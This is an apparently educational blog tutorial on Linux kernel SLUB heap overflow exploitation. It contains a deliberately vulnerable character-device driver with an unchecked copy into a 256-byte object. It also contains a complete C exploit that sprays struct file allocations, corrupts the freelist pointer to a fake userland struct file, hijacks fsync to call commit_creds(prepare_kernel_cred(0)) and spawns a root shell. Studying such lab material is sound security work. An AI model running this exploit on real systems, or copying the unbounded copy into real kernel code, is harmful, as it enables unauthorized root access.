Exploiting Linux Kernel Heap Corruptions (SLUB Allocator)

November 19, 2013 by M G

1. Introduction

In recent years, several researchers have studied Linux kernel security. The most common kernel privilege-escalation vulnerabilities fall into a few categories: NULL pointer dereferences, kernel stack overflows, kernel slab overflows, race conditions, and so on.

Some of them are pretty easy to exploit, and there is no need to prepare your own Linux kernel debugging environment to write the exploit. Others require specific knowledge of Linux kernel design, routines, memory management, etc.

In this tutorial we will explain how the SLUB allocator works and how we can get our userland code executed once we are able to corrupt some of the slab allocator's metadata.

2. The Slab Allocator

The Linux kernel has three main different memory allocators: SLAB, SLUB, and SLOB.

I would note that "slab" means the general allocator design, while SLAB/SLUB/SLOB are slab implementations in the Linux kernel.

Only one of them can be used at a time, because the choice is made when the kernel is built. SLUB has been the default since the 2.6 series, so on most systems it is the allocator that serves a kernel developer's kmalloc() calls.

So let's talk a little bit about these three implementations and describe how they work.

2.1. SLAB allocator

A slab is a set of one or more contiguous pages of memory handled by the slab allocator for an individual cache. Each cache is responsible for allocating one specific kernel structure, so a slab is a set of allocated objects of the same type.

The SLAB is described with the following structure:

[c]
struct slab
{
    union
    {
        struct
        {
            struct list_head list;
            unsigned long colouroff;
            void *s_mem;
            unsigned int inuse;      /* num of used objects */
            kmem_bufctl_t free;
            unsigned short nodeid;
        };
        struct slab_rcu __slab_cover_slab_rcu;
    };
};
[/c]

For example, if the kernel allocates two task_struct objects, both are taken from the same slab cache, because they have the same type and size.

Figure: two pages holding six objects of the same type, handled by one slab cache.

2.2. SLUB allocator

SLUB is currently the default slab allocator in the Linux kernel. It was implemented to solve some drawbacks of the SLAB design.

The following listing shows the members of the page structure that matter most to SLUB. (The full definition lives in include/linux/mm_types.h in the kernel source.)

[c]
struct page
{
    ...
    struct
    {
        union
        {
            pgoff_t index;      /* Our offset within mapping. */
            void *freelist;     /* slub first free object */
        };
        ...
        struct
        {
            unsigned inuse:16;
            unsigned objects:15;
            unsigned frozen:1;
        };
        ...
    };
    ...
    union
    {
        ...
        struct kmem_cache *slab;    /* SLUB: Pointer to slab */
        ...
    };
    ...
};
[/c]

A page's freelist pointer points to the first free object in the slab. That free object in turn stores, inside its own memory, another freelist pointer to the next free object in the slab, and so on. The inuse field keeps track of the number of objects that have been allocated.

The figure illustrates that:

The SLUB ALLOCATOR: linked list between free objects.
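To make the in-band linked list concrete, here is a small userland model of it. It is only a sketch, not kernel code: the names toy_slab, toy_alloc and toy_free, the object size and the object count are all made up for illustration, and the next-free pointer is assumed to sit in the first word of each free object.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OBJ_SIZE 64   /* hypothetical object size */
#define NR_OBJS  4    /* hypothetical number of objects in the slab */

/* Toy stand-in for the SLUB-related fields of struct page. */
struct toy_slab {
    void *freelist;                          /* first free object, NULL when full */
    unsigned inuse;                          /* objects currently handed out */
    unsigned char mem[OBJ_SIZE * NR_OBJS];   /* the objects themselves */
};

/* A free object keeps the address of the next free object in its first word. */
static void *get_next(const void *obj)
{
    void *next;
    memcpy(&next, obj, sizeof next);
    return next;
}

static void set_next(void *obj, void *next)
{
    memcpy(obj, &next, sizeof next);
}

/* Chain all objects together: obj0 -> obj1 -> ... -> NULL. */
static void toy_slab_init(struct toy_slab *s)
{
    for (size_t i = 0; i < NR_OBJS; i++) {
        void *obj = s->mem + i * OBJ_SIZE;
        void *next = (i + 1 < NR_OBJS) ? (void *)(s->mem + (i + 1) * OBJ_SIZE) : NULL;
        set_next(obj, next);
    }
    s->freelist = s->mem;
    s->inuse = 0;
}

/* Allocation pops the head of the freelist. */
static void *toy_alloc(struct toy_slab *s)
{
    void *obj = s->freelist;
    if (obj == NULL)
        return NULL;                 /* slab is full */
    s->freelist = get_next(obj);
    s->inuse++;
    return obj;
}

/* Freeing pushes the object back onto the head of the freelist. */
static void toy_free(struct toy_slab *s, void *obj)
{
    assert(s->inuse > 0);
    set_next(obj, s->freelist);
    s->freelist = obj;
    s->inuse--;
}
```

Note that the allocator trusts whatever it reads from the first word of a free object. That trust is what the rest of this article abuses.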

The SLUB allocator manages many of the kernel's dynamic allocations and deallocations of internal memory. The kernel groups these allocations by size: some caches are general-purpose and are named after the object size they serve (kmalloc-192, for instance, holds allocations larger than 128 bytes and up to 192 bytes). For example, if you invoke kmalloc to allocate 50 bytes, the chunk is taken from the general-purpose kmalloc-64 cache, because 50 is between 32 and 64.
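The size-to-cache rule can be sketched as a simple lookup. The table below is an assumption: it lists the general-purpose sizes commonly seen on x86 systems, and the real set depends on the kernel version and configuration. The function name kmalloc_cache_size is hypothetical.

```c
#include <stddef.h>

/* Assumed general-purpose cache sizes; check /proc/slabinfo on the target. */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/*
 * Return the object size of the smallest assumed kmalloc-N cache that can
 * hold a request of n bytes (n >= 1), or 0 if n is larger than every
 * entry in the table.
 */
static size_t kmalloc_cache_size(size_t n)
{
    size_t count = sizeof kmalloc_sizes / sizeof kmalloc_sizes[0];

    for (size_t i = 0; i < count; i++) {
        if (n <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    }
    return 0;
}
```

With this table, a 50-byte request maps to kmalloc-64 and a 256-byte request to kmalloc-256, which is the cache the rest of the article targets.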

For more details, you can run "cat /proc/slabinfo".

On recent kernels /proc/slabinfo is no longer readable by an unprivileged user, so you should work as the super-user while writing exploits.

2.3. SLOB allocator

The SLOB allocator was designed for small systems with limited amounts of memory, such as embedded Linux systems.

SLOB places all allocated objects on pages arranged in three linked lists.

3. Kernel SLUB overflow

Exploiting SLUB overflows requires some knowledge about the SLUB allocator (we've described it above) and is one of the most advanced exploitation techniques.

Keep in mind that objects in a slab are allocated contiguously, so if we can overwrite the metadata used by the SLUB allocator, we can redirect the execution flow into user space and run our own code. Our goal, then, is to control the freelist pointer.

The freelist pointer, as described above, is a pointer to the next free object in the slab. If freelist is NULL, the slab is full, no more free objects are available, and the allocator asks for a fresh slab (PAGE_SIZE = 4096 bytes). If we overwrite this pointer with an address of our choice, a later allocation on some kernel path will return that arbitrary address (for example, one in userland memory that we control).
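The effect of a corrupted freelist pointer can be reproduced in a userland model. This is a sketch under simplifying assumptions, not kernel code: slab_model, model_alloc and vulnerable_copy are hypothetical names, objects are 256 bytes, and the next-free pointer is assumed to be stored at the start of each free object.

```c
#include <stddef.h>
#include <string.h>

#define OBJ 256   /* object size of the modelled cache */
#define N   4     /* hypothetical objects per slab */

struct slab_model {
    void *freelist;               /* first free object */
    unsigned char mem[OBJ * N];   /* contiguous objects */
};

static void *load_ptr(const void *p)
{
    void *v;
    memcpy(&v, p, sizeof v);
    return v;
}

static void store_ptr(void *p, void *v)
{
    memcpy(p, &v, sizeof v);
}

/* Link the objects: obj0 -> obj1 -> obj2 -> obj3 -> NULL. */
static void model_init(struct slab_model *s)
{
    for (size_t i = 0; i < N; i++) {
        void *next = (i + 1 < N) ? (void *)(s->mem + (i + 1) * OBJ) : NULL;
        store_ptr(s->mem + i * OBJ, next);
    }
    s->freelist = s->mem;
}

/* Pop the head; the new head is whatever the popped object says it is. */
static void *model_alloc(struct slab_model *s)
{
    void *obj = s->freelist;
    if (obj != NULL)
        s->freelist = load_ptr(obj);
    return obj;
}

/* The bug being modelled: len is never checked against OBJ. */
static void vulnerable_copy(void *obj, const void *src, size_t len)
{
    memcpy(obj, src, len);
}
```

If the first object is allocated and then filled with 256 bytes of padding followed by a pointer, that pointer lands in the first word of the neighbouring free object. The next allocation still returns the legitimate neighbour, but the one after it returns the planted address.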

So let's make a small demonstration and look at this in a more practical way. I've built a vulnerable device driver that does some trivial input/output interactions with userland processes.

The code:

[c]
#include <linux/init.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/cdev.h>
#include <linux/fs.h>
#include <linux/slab.h>

#define DEVNAME "vuln"
#define MAX_RW (PAGE_SIZE*2)

MODULE_AUTHOR("Mohamed Ghannam");
MODULE_LICENSE("GPL v2");

static struct cdev *cdev;
static char *ramdisk;
static int vuln_major = 700, vuln_minor = 3;
static dev_t first;
static int count = 1;

static int vuln_open_dev(struct inode *inode, struct file *file)
{
    static int counter = 0;
    char *ramdisk;

    printk(KERN_INFO "opening device : %s \n", DEVNAME);
    ramdisk = kzalloc(MAX_RW, GFP_KERNEL);
    if (!ramdisk)
        return -ENOMEM;
    //file->private_data = ramdisk;
    printk(KERN_INFO "MAJOR no = %d and MINOR no = %d\n", imajor(inode), iminor(inode));
    printk(KERN_INFO "Opened device : %s\n", DEVNAME);
    counter++;
    printk(KERN_INFO "opened : %d\n", counter);
    return 0;
}

static int vuln_release_dev(struct inode *inode, struct file *file)
{
    printk(KERN_INFO "closing device : %s \n", DEVNAME);
    return 0;
}

static ssize_t vuln_write_dev(struct file *file, const char __user *buf, size_t lbuf, loff_t *ppos)
{
    int nbytes, i;
    char *copy;
    char *ramdisk = kzalloc(lbuf, GFP_KERNEL);  /* sized by the user-supplied length */

    if (!ramdisk)
        return -ENOMEM;

    copy = kmalloc(256, GFP_KERNEL);            /* fixed 256-byte object (kmalloc-256) */
    if (!copy)
        return -ENOMEM;

    if ((lbuf + *ppos) > MAX_RW) {
        printk(KERN_WARNING "Write Abort \n");
        return 0;
    }

    nbytes = lbuf - copy_from_user(ramdisk + *ppos, buf, lbuf);
    ppos += nbytes;     /* as in the original: moves the local pointer, not *ppos */

    for (i = 0; i < 0x40; i++)
        copy[i] = 0xCC;

    /* The bug: lbuf bytes are copied into a 256-byte object with no bounds check. */
    memcpy(copy, ramdisk, lbuf);
    printk("ramdisk : %s \n", ramdisk);
    printk("Writing : bytes = %d\n", (int)lbuf);
    return nbytes;
}

static ssize_t vuln_read_dev(struct file *file, char __user *buf, size_t lbuf, loff_t *ppos)
{
    int nbytes;
    char *ramdisk = file->private_data;

    if ((lbuf + *ppos) > MAX_RW) {
        printk(KERN_WARNING "Read Abort \n");
        return 0;
    }

    nbytes = lbuf - copy_to_user(buf, ramdisk + *ppos, lbuf);
    *ppos += nbytes;
    return nbytes;
}

static struct file_operations fps = {
    .owner = THIS_MODULE,
    .open = vuln_open_dev,
    .release = vuln_release_dev,
    .write = vuln_write_dev,
    .read = vuln_read_dev,
};

static int __init vuln_init(void)
{
    ramdisk = kmalloc(MAX_RW, GFP_KERNEL);
    first = MKDEV(vuln_major, vuln_minor);
    register_chrdev_region(first, count, DEVNAME);
    cdev = cdev_alloc();
    cdev_init(cdev, &fps);
    cdev_add(cdev, first, count);
    printk(KERN_INFO "Registering device %s\n", DEVNAME);
    return 0;
}

static void __exit vuln_exit(void)
{
    cdev_del(cdev);
    unregister_chrdev_region(first, count);
    kfree(ramdisk);
}

module_init(vuln_init);
module_exit(vuln_exit);
[/c]

Let's briefly describe what the code does: this is a dummy kernel module that creates a character device, "/dev/vuln", and performs some basic I/O operations.

The bug is obvious to spot.

In the vuln_write_dev() function, the ramdisk variable stores the user input and is allocated safely with lbuf, the length of the user input. The input is then copied into the copy variable, which is kmalloc'ed with only 256 bytes, and the memcpy() uses lbuf as its length. So there is a SLUB heap overflow whenever a user writes more than 256 bytes.
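For contrast, the check the driver is missing looks roughly like the following. It is written as plain userland C so it can be compiled outside the kernel. The function name checked_copy and the choice of -EINVAL are assumptions made for this sketch and do not come from the lab.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define COPY_CAP 256   /* size of the destination object, as in the driver */

/*
 * Copy len bytes into a COPY_CAP-byte destination only if they fit.
 * Returns the number of bytes copied, or -EINVAL when the request is
 * larger than the destination.
 */
static long checked_copy(unsigned char *dst, const unsigned char *src, size_t len)
{
    if (len > COPY_CAP)
        return -EINVAL;    /* refuse instead of overflowing */
    memcpy(dst, src, len);
    return (long)len;
}
```

The vulnerable driver does the equivalent of the memcpy() without the comparison against 256, so any longer write spills into the neighbouring object.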

First you should download the lab for this article. It is an archive containing a QEMU system with the kernel module, the proof of concept, and the final exploit.

Let's trigger the bug first:

So we've successfully overwritten the freelist pointer for the next free object.

If we overwrite this freelist metadata with the address of a userland function, we can run that function in kernel mode; from there we can obtain root privileges and then drop a shell.

I forgot to mention that a slab can be in one of three states: full, partial, or empty.

Full slab: The slab is fully allocated and doesn't contain any free chunks, so its freelist equals NULL.

Partial slab: The slab contains both free and allocated chunks and is able to allocate further chunks.

Empty slab: The slab doesn't hold any allocation, so all chunks are free and ready to be allocated.
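In terms of the inuse and objects counters shown earlier in struct page, the three states can be sketched as a small classifier. The enum and the function name classify_slab are hypothetical and exist only for illustration.

```c
/* Hypothetical labels for the three slab states described above. */
enum slab_state { SLAB_STATE_EMPTY, SLAB_STATE_PARTIAL, SLAB_STATE_FULL };

/*
 * inuse   = number of objects currently allocated from the slab
 * objects = total number of objects the slab can hold
 */
static enum slab_state classify_slab(unsigned inuse, unsigned objects)
{
    if (inuse == 0)
        return SLAB_STATE_EMPTY;     /* every chunk is free */
    if (inuse >= objects)
        return SLAB_STATE_FULL;      /* freelist would be NULL */
    return SLAB_STATE_PARTIAL;       /* mix of free and allocated chunks */
}
```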

4. Building the exploit

The difficulty is that, when the attacker wants to overwrite a freelist pointer, he must pay attention to the state of the slab: it should be either a full slab or an empty slab. He also needs to make sure that the freelist pointer he overwrites is the right target.

Our vulnerable object is 256 bytes allocated with kmalloc, so we should take a look at /proc/slabinfo and gather some useful information about the general-purpose kmalloc-256 cache. The next step is to compare the number of free objects with the number of used objects in the cache; then we fill the free ones to make the current slabs full, which ensures that the kernel will create a fresh slab.
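The comparison between used and total objects can be automated by parsing /proc/slabinfo. The sketch below assumes the version 2.1 line layout, in which each line starts with the cache name followed by active_objs, num_objs, objsize and objperslab. The struct and function names are hypothetical, and reading the real file requires root on recent kernels.

```c
#include <stdio.h>
#include <string.h>

/* Leading columns of one /proc/slabinfo line (assumed 2.1 layout). */
struct slab_stat {
    char name[64];
    unsigned long active_objs;   /* objects currently in use */
    unsigned long num_objs;      /* total objects in all slabs of the cache */
    unsigned long objsize;       /* object size in bytes */
    unsigned long objperslab;    /* objects per slab */
};

/* Parse one line; returns 0 on success, -1 for headers or malformed lines. */
static int parse_slabinfo_line(const char *line, struct slab_stat *out)
{
    int n = sscanf(line, "%63s %lu %lu %lu %lu", out->name,
                   &out->active_objs, &out->num_objs,
                   &out->objsize, &out->objperslab);
    return n == 5 ? 0 : -1;
}

/*
 * Return the number of free objects in the named cache, or -1 if the file
 * cannot be opened or the cache is not listed.
 */
static long free_objects_in_cache(const char *path, const char *cache)
{
    FILE *f = fopen(path, "r");
    char line[512];
    struct slab_stat st;
    long result = -1;

    if (f == NULL)
        return -1;
    while (fgets(line, sizeof line, f) != NULL) {
        if (parse_slabinfo_line(line, &st) == 0 && strcmp(st.name, cache) == 0) {
            result = (long)(st.num_objs - st.active_objs);
            break;
        }
    }
    fclose(f);
    return result;
}
```

Calling free_objects_in_cache("/proc/slabinfo", "kmalloc-256") before and after the spray gives a rough idea of how many allocations are still needed to exhaust the partial slabs.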

To do that we have to find a way to trigger allocations in the general-purpose kmalloc-256 cache, and it turns out that the kernel's struct file is a good target. Since we can't allocate it directly from user space, we call syscalls that allocate it for us, such as open(), socket(), etc.

Calling these kinds of functions allows us to make some struct file allocations and that's good for an attacker's purpose.

As we described earlier, we should ensure that there are no more free chunks for the current slab, so we have to make a lot of struct file allocations:

[c]
for (i = 0; i < 1000; i++)
    socket(AF_INET, SOCK_STREAM, 0);
[/c]

Good, so take a look again at the slab cache. The next thing to do is to trigger the overflow. If we write more than 256 bytes, we overwrite the next freelist pointer, which lets us make the kernel execute userspace code of our choice.

So how does userland code get executed in kernel land?

We have to look for function pointers and we are glad to see that struct file contains struct file_operations containing a function pointer.

Our attack is shown below:

[c]
struct file {
    .f_op = struct file_operations = {
        .fsync = ATTACKER_ADDRESS,
    };
};
[/c]

As you can see, there are a lot of function pointers and you can choose any one you want. But how do we plant this ATTACKER_ADDRESS? The idea is to build a fake struct file in userspace and put its address in the payload, so that the freelist pointer is overwritten with the address of our fake struct file. The allocator then assumes that the fake structure is the next free object, so a later struct file allocation lands in memory we control and the control flow can be moved into userspace. This is a powerful technique.

When the attacker calls the fsync(2) syscall on the corresponding file descriptor, ATTACKER_ADDRESS is executed instead of the real fsync operation. Good, so we can execute our userland code, but how can we get root privileges? It's very easy to get root by calling:

[c]
commit_creds(prepare_kernel_cred(0));
[/c]
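The fsync function-pointer hijack described before the credential call can be modelled in userland. This is only an illustration of the dispatch through f_op: the toy_ names are hypothetical, the structures are cut down to a single pointer, and nothing here touches the kernel.

```c
#include <stddef.h>

struct toy_file;

/* Cut-down operations table with a single function pointer. */
struct toy_file_operations {
    int (*fsync)(struct toy_file *file);
};

/* Cut-down file object: only the pointer to its operations table. */
struct toy_file {
    const struct toy_file_operations *f_op;
};

/* Models the kernel side: call whatever f_op->fsync points to. */
static int toy_vfs_fsync(struct toy_file *file)
{
    if (file->f_op == NULL || file->f_op->fsync == NULL)
        return -1;
    return file->f_op->fsync(file);
}

static int hijacked;   /* set when the attacker's function runs */

/* Stand-in for the legitimate fsync implementation. */
static int real_fsync(struct toy_file *file)
{
    (void)file;
    return 0;
}

/* Stand-in for getroot(): runs in place of the real operation. */
static int attacker_fsync(struct toy_file *file)
{
    (void)file;
    hijacked = 1;
    return -1;
}
```

A file whose f_op points to a table containing real_fsync behaves normally, while a fake file whose table contains attacker_fsync makes toy_vfs_fsync() run the attacker's function. In the exploit, the fake file and its table live in userspace and the dispatching code is the kernel's fsync path.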

The final exploit is like this:

[c]
#include <arpa/inet.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/utsname.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LEN 256

/* Minimal userland copies of the kernel structures we need to fake. */
struct list_head {
    struct list_head *prev, *next;
};

struct path {
    void *mnt;
    void *dentry;
};

struct file_operations {
    void *owner;
    void *llseek;
    void *read;
    void *write;
    void *aio_read;
    void *aio_write;
    void *readdir;
    void *poll;
    void *unlocked_ioctl;
    void *compat_ioctl;
    void *mmap;
    void *open;
    void *flush;
    void *release;
    void *fsync;
    void *aio_fsync;
    void *fasync;
    void *lock;
    void *sendpage;
    void *get_unmapped_area;
    void *check_flags;
    void *flock;
    void *splice_write;
    void *splice_read;
    void *setlease;
    void *fallocate;
    void *show_fdinfo;
} op;

struct file {
    struct list_head fu_list;
    struct path f_path;
    struct file_operations *f_op;
    long int buf[1024];
} file;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int win = 0;

/* Resolve a kernel symbol from /proc/kallsyms, /proc/ksyms or System.map. */
static unsigned long get_kernel_sym(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    struct utsname ver;
    int ret;
    int rep = 0;
    int oldstyle = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL) {
        f = fopen("/proc/ksyms", "r");
        if (f == NULL)
            goto fallback;
        oldstyle = 1;
    }

repeat:
    ret = 0;
    while (ret != EOF) {
        if (!oldstyle)
            ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
        else {
            ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
            if (ret == 2) {
                char *p;
                if (strstr(sname, "_O/") || strstr(sname, "_S."))
                    continue;
                p = strrchr(sname, '_');
                if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                    p = p - 4;
                    while (p > (char *)sname && *(p - 1) == '_')
                        p--;
                    *p = '\0';
                }
            }
        }
        if (ret == 0) {
            fscanf(f, "%s\n", sname);
            continue;
        }
        if (!strcmp(name, sname)) {
            printf("[+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
            fclose(f);
            return addr;
        }
    }

    fclose(f);
    if (rep)
        return 0;

fallback:
    uname(&ver);
    if (strncmp(ver.release, "2.6", 3))
        oldstyle = 1;
    sprintf(sname, "/boot/System.map-%s", ver.release);
    f = fopen(sname, "r");
    if (f == NULL)
        return 0;
    rep = 1;
    goto repeat;
}

/* Runs in kernel mode once the fake f_op->fsync pointer is called. */
int getroot(void)
{
    win = 1;
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

int main(int argc, char **argv)
{
    char *payload;
    int payload_len;
    void *ptr = &file;

    /* 256 bytes of padding, then the address of the fake struct file. */
    payload_len = 256 + 9;
    payload = malloc(payload_len + 1);   /* +1 for the terminator written below */
    if (!payload) {
        perror("malloc");
        return -1;
    }
    memset(payload, 'A', payload_len);
    memcpy(payload + 256, &ptr, sizeof(ptr));
    payload[payload_len] = 0;

    int fd = open("/dev/vuln", O_RDWR);
    if (fd == -1) {
        perror("open ");
        return -1;
    }

    commit_creds = (_commit_creds)get_kernel_sym("commit_creds");
    prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred");

    /* Fill the partial slabs so that the next allocations come from a fresh slab. */
    int i;
    for (i = 0; i < 1000; i++) {
        if (socket(AF_INET, SOCK_STREAM, 0) == -1) {
            perror("socket fill ");
            return -1;
        }
    }

    /* Trigger the overflow: the freelist pointer now holds &file. */
    write(fd, payload, payload_len);

    /* The second allocation is served from the corrupted freelist pointer. */
    int target_fd;
    target_fd = socket(AF_INET, SOCK_STREAM, 0);
    target_fd = socket(AF_INET, SOCK_STREAM, 0);

    file.f_op = &op;
    op.fsync = &getroot;
    fsync(target_fd);

    pid_t pid = fork();
    if (pid == 0) {
        setsid();
        while (1) {
            sleep(9999);
        }
    }

    printf("[+] rooting shell ....");
    close(target_fd);
    if (win) {
        printf("OK\n[+] Dropping root shell ... \n");
        execl("/bin/sh", "/bin/sh", NULL);
    } else
        printf("FAIL \n");

    return 0;
}
[/c]

Let's run the code:

Bingo!

5. Conclusion

We have studied how the kernel SLUB allocator works and how a corrupted freelist pointer can be turned into root privileges. Exploiting kernel vulnerabilities is not so different from exploiting userspace ones, but kernel exploit development requires strong knowledge of how the kernel works, its routines, how it protects against race conditions, etc.

It was very fun to play with this kind of bug, as there are not a whole lot of modern, public examples of SLUB overflow exploits.

Here are some references that might help you:

Linux Kernel CAN SLUB Overflow

A Guide to Kernel Exploitation: Attacking the Core

PlaidCTF2013 servr CTF challenge
